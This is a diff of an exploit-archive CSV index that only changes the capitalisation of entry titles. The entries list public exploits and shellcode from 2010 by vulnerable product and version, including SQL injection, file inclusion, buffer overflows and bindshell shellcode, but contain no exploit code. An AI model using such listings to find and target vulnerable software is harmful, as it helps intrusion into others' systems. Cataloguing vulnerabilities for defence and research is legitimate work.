14306,platforms/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps,0 14309,platforms/windows/remote/14309.html,"RSP MP3 Player OCX 3.2 - ActiveX Buffer Overflow",2010-07-09,blake,windows,remote,0 -14308,platforms/php/webapps/14308.txt,"WordPress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 +14308,platforms/php/webapps/14308.txt,"Wordpress Firestats Plugin - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps,0 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 -14310,platforms/php/webapps/14310.js,"DotDefender 3.8-5 - No Authentication Remote Code Execution Through Cross-Site Scripting",2010-07-09,rAWjAW,php,webapps,80 +14310,platforms/php/webapps/14310.js,"DotDefender 3.8-5 - Pre-Authentication Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps,0 14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) - Upload",2010-07-10,Sid3^effects,php,webapps,0 14335,platforms/php/webapps/14335.txt,"Joomla Health & Fitness Stats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 @@ -12593,7 +12593,7 @@ id,file,description,date,author,platform,type,port 14329,platforms/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14330,platforms/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0 -14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 +14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - netcat bindshell port 8080 Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 @@ -12659,7 +12659,7 @@ id,file,description,date,author,platform,type,port 14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow (Metasploit)",2010-07-19,Madjix,windows,remote,0 14413,platforms/windows/dos/14413.txt,"Microsoft Internet Explorer 7.0 - Denial of Service Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 - 'STEAMBLOB' Command Remote Denial of Service",2010-07-20,"Luigi Auriemma",windows,dos,0 -14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 +14415,platforms/php/webapps/14415.html,"EZ-osCommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 14416,platforms/windows/remote/14416.html,"SapGUI BI 7100.1.400.8 - Heap Corruption Exploit",2010-07-20,"Elazar Broad",windows,remote,0 14419,platforms/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps,0 14422,platforms/multiple/dos/14422.c,"libpng 1.4.2 - Denial of Service",2010-07-20,kripthor,multiple,dos,0 @@ -12675,18 +12675,18 @@ id,file,description,date,author,platform,type,port 14433,platforms/windows/local/14433.pl,"ZipCentral - '.zip' Buffer Overflow (SEH)",2010-07-21,"Jiten Pathy",windows,local,0 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - (welcome.php id) Blind SQL Injection",2010-07-22,JosS,php,webapps,0 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - (news.php id) Blind SQL Injection",2010-07-22,JosS,php,webapps,0 -14437,platforms/php/webapps/14437.txt,"Free PHP photo gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 -14438,platforms/php/webapps/14438.txt,"Free PHP photo gallery script - Remote File inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 +14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0 +14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0 14439,platforms/php/webapps/14439.txt,"phpBazar admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0 14440,platforms/php/webapps/14440.txt,"PHPBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0 -14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 +14441,platforms/php/webapps/14441.txt,"Wordpress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0 14442,platforms/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,php,webapps,0 14443,platforms/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,php,webapps,0 14444,platforms/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser (FF3.6.7/SM 2.0.6) - Clickjacking",2010-07-23,"Pouya Daneshmand",windows,remote,0 -14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (beta) / 1 (beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 +14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote Buffer Overflow Exploit (Post-Authenticated) (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 @@ -12755,7 +12755,7 @@ id,file,description,date,author,platform,type,port 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0 14537,platforms/multiple/dos/14537.txt,"Oracle MySQL - 'ALTER DATABASE' Remote Denial of Service",2010-08-03,"Shane Bester",multiple,dos,0 14558,platforms/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps,0 -14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 Plugin - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 +14541,platforms/php/webapps/14541.txt,"Wordpress NextGEN Smooth Gallery 0.12 Plugin - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps,0 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - (.m3u / .pls / .smi / .wpl / .wax / .wvx / .ram) Exploit",2010-08-04,"Oh Yaw Theng",windows,local,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format Denial of Service",2010-08-03,antrhacks,windows,dos,0 14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 @@ -12839,7 +12839,7 @@ id,file,description,date,author,platform,type,port 14648,platforms/php/webapps/14648.txt,"GuestBook Script PHP - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-08-15,"AnTi SeCuRe",php,webapps,0 14651,platforms/windows/local/14651.py,"Rosoft media player 4.4.4 - SEH Buffer Overflow",2010-08-15,dijital1,windows,local,0 14650,platforms/php/webapps/14650.html,"Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0 -14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 & CMySQLite 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 +14654,platforms/php/webapps/14654.php,"CMSQLite 1.2 / CMySQLite 1.3.1 - Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) - SQL Injection",2010-08-16,Forza-Dz,php,webapps,0 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 - Local File Inclusion",2010-08-16,"Salvatore Fresta",php,webapps,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery - SQL Injection",2010-08-16,"al bayraqim",php,webapps,0 @@ -12949,7 +12949,7 @@ id,file,description,date,author,platform,type,port 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2010-08-27,"Nikolas Sotiriu",linux,remote,0 14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - (color.dll) DLL Hijacking Exploit",2010-08-25,"xsploited security",windows,local,0 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0 -14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 +14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0 14799,platforms/php/webapps/14799.txt,"osCommerce Online Merchant - Remote File Inclusion",2010-08-26,LoSt.HaCkEr,php,webapps,0 14801,platforms/php/webapps/14801.txt,"atomic photo album 1.0.2 - Multiple Vulnerabilities",2010-08-26,sh00t0ut,php,webapps,0 @@ -12965,7 +12965,7 @@ id,file,description,date,author,platform,type,port 14821,platforms/asp/webapps/14821.txt,"Shop Creator 4.0 - SQL Injection",2010-08-27,Pouya_Server,asp,webapps,0 14822,platforms/php/webapps/14822.txt,"DiY-CMS 1.0 - Multiple Remote File Inclusion",2010-08-28,LoSt.HaCkEr,php,webapps,0 14823,platforms/php/webapps/14823.txt,"textpattern CMS 4.2.0 - Remote File Inclusion",2010-08-28,Sn!pEr.S!Te,php,webapps,0 -14824,platforms/windows/dos/14824.txt,"Leadtools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 +14824,platforms/windows/dos/14824.txt,"LeadTools ActiveX Raster Twain 16.5 - (LtocxTwainu.dll) Buffer Overflow",2010-08-28,LiquidWorm,windows,dos,0 14826,platforms/php/webapps/14826.txt,"GaleriaSHQIP 1.0 - SQL Injection",2010-08-28,Valentin,php,webapps,0 14827,platforms/php/webapps/14827.py,"Blogman 0.7.1 - 'profile.php' SQL Injection",2010-08-28,"Ptrace Security",php,webapps,0 14829,platforms/php/webapps/14829.txt,"CF Image Hosting Script 1.3 - (settings.cdb) Information Disclosure",2010-08-28,Dr.$audi,php,webapps,0 @@ -12973,7 +12973,7 @@ id,file,description,date,author,platform,type,port 14831,platforms/windows/local/14831.rb,"SnackAmp 3.1.2 - SMP Buffer Overflow (SEH)",2010-08-29,"James Fitts",windows,local,0 14832,platforms/windows/dos/14832.rb,"SnackAmp 3.1.2 - (.wav) Buffer Overflow (PoC)",2010-08-29,"James Fitts",windows,dos,0 14833,platforms/php/webapps/14833.txt,"vBulletin 3.8.4 / 3.8.5 - Registration Bypass",2010-08-29,"Immortal Boy",php,webapps,0 -14834,platforms/php/webapps/14834.txt,"Max's Guestbook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 +14834,platforms/php/webapps/14834.txt,"Max's GuestBook - (HTML Injection / Cross-Site Scripting) Multiple Vulnerabilities",2010-08-29,"MiND C0re",php,webapps,0 14835,platforms/php/webapps/14835.txt,"Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusion",2010-08-29,JosS,php,webapps,0 14837,platforms/php/webapps/14837.txt,"CF Image Hosting Script 1.3.8 - Remote File Inclusion",2010-08-29,"FoX HaCkEr",php,webapps,0 14838,platforms/php/webapps/14838.txt,"Seagull 0.6.7 - SQL Injection",2010-08-29,Sweet,php,webapps,0 @@ -12986,7 +12986,7 @@ id,file,description,date,author,platform,type,port 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 - (viewpost.php) SQL Injection",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0 -14852,platforms/windows/dos/14852.txt,"leadtools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 +14852,platforms/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer",2010-09-01,Abysssec,windows,remote,0 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0 @@ -13014,24 +13014,24 @@ id,file,description,date,author,platform,type,port 14894,platforms/php/webapps/14894.py,"A-Blog 2.0 - (sources/search.php) SQL Injection",2010-09-05,"Ptrace Security",php,webapps,0 14895,platforms/windows/remote/14895.py,"Microsoft MPEG Layer-3 - Remote Command Execution Exploit",2010-09-05,Abysssec,windows,remote,0 14896,platforms/php/webapps/14896.txt,"ijoomla magazine 3.0.1 - Remote File Inclusion",2010-09-05,LoSt.HaCkEr,php,webapps,0 -14897,platforms/php/webapps/14897.txt,"chillycms 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 +14897,platforms/php/webapps/14897.txt,"ChillyCMS 1.1.3 - Multiple Vulnerabilities",2010-09-05,"AmnPardaz ",php,webapps,0 14898,platforms/asp/webapps/14898.txt,"ifnuke - Multiple Vulnerabilities",2010-09-05,Abysssec,asp,webapps,0 14901,platforms/php/webapps/14901.txt,"Joomla Component Clantools 1.5 - Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow PoC",2010-09-05,0x6264,linux,dos,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 +14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - SEH Buffer Overflow Crash PoC",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script - (sbiz_id) Blind SQL Injection",2010-09-05,"BorN To K!LL",php,webapps,0 14911,platforms/php/webapps/14911.sh,"Gantry Framework 3.0.10 - (Joomla) Blind SQL Injection",2010-09-05,jdc,php,webapps,0 14932,platforms/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",2010-09-07,mr_me,windows,webapps,0 14914,platforms/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14915,platforms/php/webapps/14915.txt,"interphoto gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 +14915,platforms/php/webapps/14915.txt,"interphoto Gallery - Multiple Vulnerabilities",2010-09-06,Abysssec,php,webapps,0 14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website - SQL Injection",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free - Blind SQL Injection",2010-09-06,"Stephan Sattler",php,webapps,0 -14923,platforms/php/webapps/14923.txt,"WordPress Events Manager Extended Plugin - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0 +14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin - Persistent Cross-Site Scripting",2010-09-06,Craw,php,webapps,0 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal",2010-09-07,Saxtor,php,webapps,0 14925,platforms/linux/remote/14925.txt,"weborf 0.12.2 - Directory Traversal",2010-09-07,Rew,linux,remote,0 14927,platforms/php/webapps/14927.txt,"dynpage 1.0 - Multiple Vulnerabilities",2010-09-07,Abysssec,php,webapps,0 @@ -13154,13 +13154,13 @@ id,file,description,date,author,platform,type,port 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0 15098,platforms/php/webapps/15098.txt,"FreePBX 2.8.0 - Recordings Interface Allows Remote Code Execution",2010-09-24,"Trustwave's SpiderLabs",php,webapps,0 -15114,platforms/php/webapps/15114.php,"Zenphoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0 +15114,platforms/php/webapps/15114.php,"ZenPhoto - Config Update / Command Execution",2010-09-26,Abysssec,php,webapps,0 15102,platforms/win_x86/webapps/15102.txt,"Traidnt UP - Cross-Site Request Forgery Add Admin Account",2010-09-24,"John Johnz",win_x86,webapps,80 15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - VMkbd.sys Denial of Service",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0 -15157,platforms/php/webapps/15157.txt,"je guestbook 1.0 joomla component - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 +15157,platforms/php/webapps/15157.txt,"je GuestBook 1.0 joomla component - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0 15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 - (eCal Module) Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0 @@ -13218,7 +13218,7 @@ id,file,description,date,author,platform,type,port 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0 15201,platforms/windows/local/15201.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass)",2010-10-04,"Muhamad Fadzil Ramli",windows,local,0 -15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Pro SP3 (EN) 32-bit - Add new local administrator _secuid0_ shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 +15202,platforms/win_x86/shellcode/15202.c,"Win32/XP Pro SP3 (EN) 32-bit - Add new local administrator _secuid0_ Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15203,platforms/win_x86/shellcode/15203.c,"Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",win_x86,shellcode,0 15204,platforms/php/webapps/15204.txt,"DNET Live-Stats 0.8 - Local File Inclusion",2010-10-04,blake,php,webapps,0 15205,platforms/php/webapps/15205.txt,"Aspect Ratio CMS - Blind SQL Injection",2010-10-04,"Stephan Sattler",php,webapps,0 @@ -13239,10 +13239,10 @@ id,file,description,date,author,platform,type,port 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0 15222,platforms/php/webapps/15222.txt,"Joomla Community Builder Enhenced (CBE) Component - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0 -15224,platforms/php/webapps/15224.txt,"js calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 -15225,platforms/php/webapps/15225.txt,"videodb 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 +15224,platforms/php/webapps/15224.txt,"js Calendar 1.5.1 joomla component - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0 +15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0 -39571,platforms/php/webapps/39571.txt,"Zenphoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 +39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80 15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 - (1216) Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion MG - User-Fotoalbum SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 @@ -13425,11 +13425,11 @@ id,file,description,date,author,platform,type,port 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0 15430,platforms/php/webapps/15430.txt,"Joomla ccInvoices Component (com_ccinvoices) - SQL Injection",2010-11-05,FL0RiX,php,webapps,0 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment NULL Pointer Deference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0 -15432,platforms/windows/dos/15432.html,"LEADTOOLS 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15433,platforms/windows/dos/15433.html,"LEADTOOLS 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15434,platforms/windows/dos/15434.html,"LEADTOOLS 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15435,platforms/windows/dos/15435.html,"LEADTOOLS 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 -15436,platforms/windows/dos/15436.html,"LEADTOOLS 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15434,platforms/windows/dos/15434.html,"LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15435,platforms/windows/dos/15435.html,"LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 +15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Remote Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Remote Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0 15439,platforms/php/webapps/15439.txt,"Joomla Component (com_connect) - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0 @@ -13450,7 +13450,7 @@ id,file,description,date,author,platform,type,port 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - (.vbs) Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - (.cda) Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0 -15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0 +15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0 15460,platforms/php/webapps/15460.txt,"Joomla Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0 @@ -13491,7 +13491,7 @@ id,file,description,date,author,platform,type,port 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 -15513,platforms/php/webapps/15513.txt,"WordPress Event Registration Plugin 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 +15513,platforms/php/webapps/15513.txt,"Wordpress Event Registration Plugin 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 15514,platforms/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow",2010-11-13,dookie,windows,dos,0 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0 @@ -13533,7 +13533,7 @@ id,file,description,date,author,platform,type,port 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0 